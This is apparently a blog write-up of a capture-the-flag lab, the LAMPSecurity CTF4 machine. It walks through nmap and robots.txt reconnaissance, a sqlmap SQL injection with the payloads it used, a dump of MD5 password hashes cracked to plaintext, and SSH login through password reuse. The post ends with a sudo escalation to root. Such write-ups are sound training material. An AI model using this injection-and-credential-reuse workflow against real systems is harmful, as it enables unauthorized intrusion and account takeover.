Core dump overflow

Core dump in progress...

Pentest lab - LAMPSecurity CTF4

| Comments

Today’s target is part of a CTF series by the LAMPSecurity project.

The Nmap scan reveals just a few ports:

1
2
3
4
5
6
7
8
9
10
11
12
13
root@pwnbox:~/Downloads#nmap -sS -sV -p1-65535 192.168.80.152

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-03-02 09:26 EST
Nmap scan report for 192.168.80.152
Host is up, received arp-response (0.00038s latency).
Not shown: 65531 filtered ports, 1 closed port
Reason: 65369 no-responses, 162 host-prohibiteds and 1 reset
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 4.3 (protocol 2.0)
25/tcp open  smtp    syn-ack ttl 64 Sendmail 8.13.5/8.13.5
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.0 ((Fedora))
MAC Address: 00:0C:29:1D:B6:45 (VMware)
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix

Checking out the web server, we can see this page:

home

Let’s get digging!

Recon

The Blog section contains some blog posts, for which the URL looks like this: http://192.168.80.152/index.html?page=blog&title=Blog&id=5. That id parameter calls for SQLi testing and the page parameter could be vulnerable to LFI. But for now, let’s keep sniffing around.

One of the things I always do when doing web based challenges is check if there’s anything of interest in the robots.txt file. So I did it here as well and I wasn’t disappointed:

1
2
3
4
5
6
User-agent: *
Disallow: /mail/
Disallow: /restricted/
Disallow: /conf/
Disallow: /sql/
Disallow: /admin/

Quite a few places to check! Let’s see what we’ve got.

  • /mail/

This is not your regular mail server:

squirrelmail

I’ve never seen this before, so I checked the project’s homepage:

SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.

Ok, will come back to this, for now I’m just checking the entire thing for possible entry points.

  • /restricted/

Trying to get to this folder will pop up a basic authentication window. Moving on

  • /conf/

This one gives an internal server error, but discloses the e-mail address of the server administrator: dstevens@localhost

  • /sql/

Here we have a directory indexing with a db.sql file that contains the following:

1
2
3
4
use ehks;
create table user (user_id int not null auto_increment primary key, user_name varchar(20) not null, user_pass varchar(32) not null);
create table blog (blog_id int primary key not null auto_increment, blog_title varchar(255), blog_body text, blog_date datetime not null);
create table comment (comment_id int not null auto_increment primary key, comment_title varchar (50), comment_body text, comment_author varchar(50), comment_url varchar(50), comment_date datetime not null);
  • /admin/

And finally, an admin login page.

admin

Also, the search functionality is vulnerable to XSS! Ok, we have enough information to start poking deeper.

Getting in

First thing I tried was to put a quote in the id parameter, and a SQL error popped up: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20. Time to fire Sqlmap!

First, I enumerated the available databases:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
sqlmap -u "http://192.168.80.152/index.html?page=blog&title=Blog&id=2" -p "id" --dbms=MySQL --dbs

[06:05:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=blog&title=Blog&id=2 AND 4151=4151

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))tueL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x61536d554d5745557253,0x7162716a71),NULL,NULL-- 
---
[06:05:45] [INFO] testing MySQL
[06:05:45] [INFO] confirming MySQL
[06:05:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL >= 5.0.0
[06:05:45] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test

I then looked at the ehks database, the interesting table contains usernames and password hashes:

1
2
3
4
5
6
7
8
9
10
11
12
13
Database: ehks
Table: user
[6 entries]
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass                        |
+---------+-----------+----------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f |
+---------+-----------+----------------------------------+

I cracked the MD5 hashes with an online tool, behold the passwords!

1
2
3
4
5
6
dstevens: ilike2surf
achen: seventysixers
pmoore: Homesite
jdurbin: Sue1978
sorzek: pacman
ghighland: undone1

With dstevens’ credentials I was able to log in both to the mail and admin panel. The admin functionality allows you to create another blog page, which I tested and it works. The mailbox was more interesting, because it was filled with OSSEC HIDS logs of my attacks! Will delete them before I’m done, but for now I scrolled all the way to the bottom to find some real mail:

1
2
3
4
5
6
7
I'm installing OSSEC v2 on the server - so I also had to install gcc and
binutils.  Just wanted to let you know.

-- 
Andrew Chen
Unix Administrator
Ehks Data Research Center

I’m thinking this mail is not just for occupying storage, but it’s hinting that we’ll have to do some binary exploitation on the target..Anyway, there is more mail about the server setup:

1
2
3
4
5
6
7
8
9
10
Hello all,

  the server is up and running now and should be able to support most of
our needs.  Don and I are still working on installing a few more patches
and configuring things.  Let us know if you have any problems.  Thanks!

-- 
Don Stevens
Sr. Unix Admin
Prof. Ehks Data Research Center
1
2
3
4
5
6
7
8
9
10
11
12
13


Hey Don,

  I think I got the server pretty much set up.  I just have to make some
more adjustments.  Unfortunately I couldn't get RoundCube installed
because our version of PHP is too low.  I'll send more updates as I make
them.

-- 
James Durbin
Webmaster
Prof. Ehks Data Research Center

There is also mail about a calendar feature that I wasn’t aware of:

1
2
3
4
5
6
7
8
9
10
Hello all,

  I'd like to announce that the new calendaring software is online.  You
all have accounts that you can log in with, they have the same username
and password as your machine accounts.  Feel free to log into the new
system at http://192.168.0.6/calendar.  Let me know if you have any
problems.

-- 
Don Stevens

I’ve almost forgotten to check the /restricted folder, so I next did that. It worked with the pair of pmoore/Homesite. Inside there are 2 text files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
blog_instructions.txt

Instructions for Posting to the Blog
====================================

Just log into the admin section at http://192.168.0.6/admin.
Use your regular machine credentials (username and password).
Once you're logged in click the "Blog" link.

webmail_instructions.txt  

Instructions for Webmail
========================

Browse to the URL http://192.168.0.6/mail
Log in with your regular machine credentials (username and password).
Use webmail ;)

Let Don or James know if you're having problems.

Just stuff we had figured on our own. I checked the PHP version, because of the mail hint, the headers mention it as being 5.1.2. Next I logged in for the calendar:

calendar

In the admin tab we can modify some calendar options and add a new user. Nothing too helpful in hacking the target, although I did try a RFI because a Nessus scan I’ve run indicated the calendar was vulnerable to arbitrary file inclusion. So the last thing left to try before thinking of more options was to see if I could login to SSH with any of the usernames and passwords I had. And I was able to get in the box from the first try, as dstevens!

I looked around in his home directory, the files related to the site are hosted there. Then I tried to read the /etc/sudoers file, and it worked with sudo and his password:

1
2
3
4
5
6
...
# User privilege specification
root  ALL=(ALL) ALL
dstevens  ALL=(ALL)   ALL
achen ALL=(ALL)   NOPASSWD:ALL
...

Well, look at these privileges! Then it’s all the matter of becoming root with a simple su:

1
2
3
4
[dstevens@ctf4 calendar]$ sudo su -
Password:
[root@ctf4 ~]# whoami
root

Game over! Although at the beginning there seemed to be multiple web avenues for exploitation, most of them were informational, and it was just the SQL injection that gave the keys to the kingdom. Lax permissions and password reuse facilitated the compromise of the target.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/ Q: How do you shoot a blue elephant? A: \
| With a blue-elephant gun.               |
|                                         |
| Q: How do you shoot a pink elephant? A: |
| Twist its trunk until it turns blue,    |
| then shoot it with                      |
|                                         |
\ a blue-elephant gun.                    /
 -----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Comments